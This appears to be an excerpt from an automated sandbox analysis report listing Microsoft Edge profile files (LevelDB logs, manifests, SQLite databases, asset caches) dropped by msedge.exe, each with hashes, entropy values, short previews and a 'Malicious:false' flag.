                                                                                                                                                                                                                                                                                                                            SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):313
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.257954903541866
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHlv1N723oH+Tcwtp3hBtB2KLld0BL+q2PN723oH+Tcwtp3hBWsIFUv:7ZaYebp3dFLIYvVaYebp3eFUv
                                                                                                                                                                                                                                                                                                                            MD5:A6A29DF6350D22B843C195D33F23B0FF
                                                                                                                                                                                                                                                                                                                            SHA1:FDFF8AD71FC4C7A5D0699D1EE255E2E42AE453D7
                                                                                                                                                                                                                                                                                                                            SHA-256:406C653DFADA6A590815DCB8F38C9AFADA98859BBBAF2765274B572554A2696B
                                                                                                                                                                                                                                                                                                                            SHA-512:F5C444846E9BA438593FC70D80AD5A644BD26899D5CC4520546A542BBF3E8366D61B228FFF956AAA09A1F59ED2684BE0C05F59CAD78B1F8B5006F1DBE9CDF106
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:24.074 1dd8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/05-02:39:24.163 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                                                                                            Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.222866148985454
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24576:IbPMZpV3fI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpV3fx2mjF
                                                                                                                                                                                                                                                                                                                            MD5:149BB9FD83F19F6CE1142CF6FDB6B9BB
                                                                                                                                                                                                                                                                                                                            SHA1:DC156191ABC1FAA32F21C60F60AF556A4E2A7514
                                                                                                                                                                                                                                                                                                                            SHA-256:62C73DCD9283DBE0147A68948C2B0CAE0AB388C8085662A1AD69D35D26696BF7
                                                                                                                                                                                                                                                                                                                            SHA-512:0AF2FAF0AD83B18E5F9CC3A04FC6E4CFAD42430314C98BD30717BFDFBEC796CE1EF76795DA016265055C671876C4CDF6392F1A5036AF4572B9D798DD47B90FD7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.087796543097942
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHiVDMq2PN723oH+Tcwt9Eh1tIFUttyZmwDYVDPkwON723oH+Tcwt9Eh15LJ:7CpMvVaYeb9Eh16FUtY/8VDP5OaYeb9O
                                                                                                                                                                                                                                                                                                                            MD5:78CF45EB57B26F2DC690D7C3927BCC74
                                                                                                                                                                                                                                                                                                                            SHA1:D9F1C3DE4E1A0874EF69C5F1DEAD5FA534B23C0E
                                                                                                                                                                                                                                                                                                                            SHA-256:3C260841A322DB245BD2DFC8AA69013B81627F797ADA99DBA3C0402EAE6B9819
                                                                                                                                                                                                                                                                                                                            SHA-512:4234759B8FA217768FD91DC634500CDC8C6D88F981C0537B2CEACE8CD3541F56A4D68955FD775CE103BFF61B6CF85168CAC1973011E7C7A7E474D136A4AB55B4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:23.392 20f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/05-02:39:23.394 20f4 Recovering log #3.2025/01/05-02:39:23.398 20f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):340
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.087796543097942
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHiVDMq2PN723oH+Tcwt9Eh1tIFUttyZmwDYVDPkwON723oH+Tcwt9Eh15LJ:7CpMvVaYeb9Eh16FUtY/8VDP5OaYeb9O
                                                                                                                                                                                                                                                                                                                            MD5:78CF45EB57B26F2DC690D7C3927BCC74
                                                                                                                                                                                                                                                                                                                            SHA1:D9F1C3DE4E1A0874EF69C5F1DEAD5FA534B23C0E
                                                                                                                                                                                                                                                                                                                            SHA-256:3C260841A322DB245BD2DFC8AA69013B81627F797ADA99DBA3C0402EAE6B9819
                                                                                                                                                                                                                                                                                                                            SHA-512:4234759B8FA217768FD91DC634500CDC8C6D88F981C0537B2CEACE8CD3541F56A4D68955FD775CE103BFF61B6CF85168CAC1973011E7C7A7E474D136A4AB55B4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:23.392 20f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/05-02:39:23.394 20f4 Recovering log #3.2025/01/05-02:39:23.398 20f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.4624717951077544
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuTrcW:TouQq3qh7z3bY2LNW9WMcUvBuTrc
                                                                                                                                                                                                                                                                                                                            MD5:50517CF353478F0CC5A419610D0F35B3
                                                                                                                                                                                                                                                                                                                            SHA1:4E6798F505684A86774E5ADE362F6FF4A2B52971
                                                                                                                                                                                                                                                                                                                            SHA-256:AF150CF1B03394426B080F1991DA8A05B7D6D39A2E5B4E3647300EC20562D14D
                                                                                                                                                                                                                                                                                                                            SHA-512:8F10A14922A5C7AC8514A6076F5625CBA8154D50873785C75ACFF9D4A7687E6B702F051D1DDF3671C2A42530776BB5BAB7A5C6FA653B1CFEB7EBFA7598E3A2E6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):10240
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                                            MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                                            SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                                            SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                                            SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEZl5tvl/:/M/xT02zK
                                                                                                                                                                                                                                                                                                                            MD5:62D45392E36171AF9107270C4E6180BB
                                                                                                                                                                                                                                                                                                                            SHA1:04BF369979AA44CD588323C518497DE98F223672
                                                                                                                                                                                                                                                                                                                            SHA-256:004896A68BD78C0619794E3FC8E44D20C1FB98694336D31BC821C97025BF9374
                                                                                                                                                                                                                                                                                                                            SHA-512:CF93E8DD959FC260624E6BC29DA0C745281D85BB0AAEDE312CA051638AB84A5E0AF9733B8F6364E4D385350F85FB92A71DCCB60629F49DD617A5724485264A60
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):352
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.16353398067036
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfio1Vq2PN723oH+TcwtnG2tMsIFUttfio1gZmwDfio1IkwON723oH+TcwtnGg:7/5/vVaYebn9GFUt95y/z5+5OaYebn9b
                                                                                                                                                                                                                                                                                                                            MD5:AB85783E725949D7584966E33C73773A
                                                                                                                                                                                                                                                                                                                            SHA1:98504ED790E3C0A410F6D82AEE1A45D81AE0D1B3
                                                                                                                                                                                                                                                                                                                            SHA-256:24FCE86E4584F9DC05B16D2F384762A597E33349EF694527864E19574FBC466C
                                                                                                                                                                                                                                                                                                                            SHA-512:BFC04E4B399CAB0FD75036556B28CCE25B7B433BB72440F99F792C2F4CC68F808E5375FB6E198BCF1B38A492B576735EACA04BE1182E32EB815F9EABA75C1FC6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.368 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/05-02:39:15.368 1de0 Recovering log #3.2025/01/05-02:39:15.368 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):352
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.16353398067036
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfio1Vq2PN723oH+TcwtnG2tMsIFUttfio1gZmwDfio1IkwON723oH+TcwtnGg:7/5/vVaYebn9GFUt95y/z5+5OaYebn9b
                                                                                                                                                                                                                                                                                                                            MD5:AB85783E725949D7584966E33C73773A
                                                                                                                                                                                                                                                                                                                            SHA1:98504ED790E3C0A410F6D82AEE1A45D81AE0D1B3
                                                                                                                                                                                                                                                                                                                            SHA-256:24FCE86E4584F9DC05B16D2F384762A597E33349EF694527864E19574FBC466C
                                                                                                                                                                                                                                                                                                                            SHA-512:BFC04E4B399CAB0FD75036556B28CCE25B7B433BB72440F99F792C2F4CC68F808E5375FB6E198BCF1B38A492B576735EACA04BE1182E32EB815F9EABA75C1FC6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.368 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/05-02:39:15.368 1de0 Recovering log #3.2025/01/05-02:39:15.368 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.613604964045737
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWppMAlaiNrc:TLapR+DDNzWjJ0npnyXKUO8+jmpEymL
                                                                                                                                                                                                                                                                                                                            MD5:56851450E7F0D243FC021BDAEEED78A6
                                                                                                                                                                                                                                                                                                                            SHA1:15A3E6CBBDDC87C7AFACE05944E33A811C7F5F72
                                                                                                                                                                                                                                                                                                                            SHA-256:DFC7312CD2797825895E923B8B053D9DD414E15B1779488716D10E0874A8D43F
                                                                                                                                                                                                                                                                                                                            SHA-512:2B24EBC6FE5ACAA0373ABB510FFF4D63F51EC587166951EBA7A94233DBDEA4FF3569A63DBBD399EF6B718B69FC27240D5AF88387AFCC3018DFD868D3C950BCDF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):375520
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.354070221917899
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6144:7A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:7FdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                            MD5:7560C9330BDD68B89D283B689B946B68
                                                                                                                                                                                                                                                                                                                            SHA1:E81864704C36F1F5B06758CC831BFF6AEC762F0C
                                                                                                                                                                                                                                                                                                                            SHA-256:C648ADFC82CFDA81C92DB62F70AF9F96F6B2C01586D10ADC9347C7AC45CB5128
                                                                                                                                                                                                                                                                                                                            SHA-512:FF2520DBFD07DF423EC139286614A09225010D3AA9D4AFE88E4C19D7C75FC3A804179B08D1E6087CAE44E134E3D6BD99E7D3B3E191E8E74ED16E5788FDFA7EE1
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:...m.................DB_VERSION.1&.x3q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380536364816092..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):315
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.140662694291286
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHS+UIoM1N723oH+Tcwtk2WwnvB2KLlde5yq2PN723oH+Tcwtk2WwnvIFUv:7y+UbsaYebkxwnvFLS8vVaYebkxwnQF2
                                                                                                                                                                                                                                                                                                                            MD5:97B150212D9141E3E34BC3451E8D055E
                                                                                                                                                                                                                                                                                                                            SHA1:5D977AD7D0382F079470857CAD8E097D92CCB179
                                                                                                                                                                                                                                                                                                                            SHA-256:054D8F3AA74B83085C16CAE2F1A29CC832FD9D1D1362717297D35C0709DB3A17
                                                                                                                                                                                                                                                                                                                            SHA-512:A7D39169D94F440F8F4B0C4D4536A0914AE38A01060CCB2AB6F7AFF1FBE48A987BABD72B9250F05572767532862023C82CD8AA6DC7ABDFB8A0BE1E0AC077FB0E
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:23.410 2114 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/05-02:39:23.839 2114 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):41
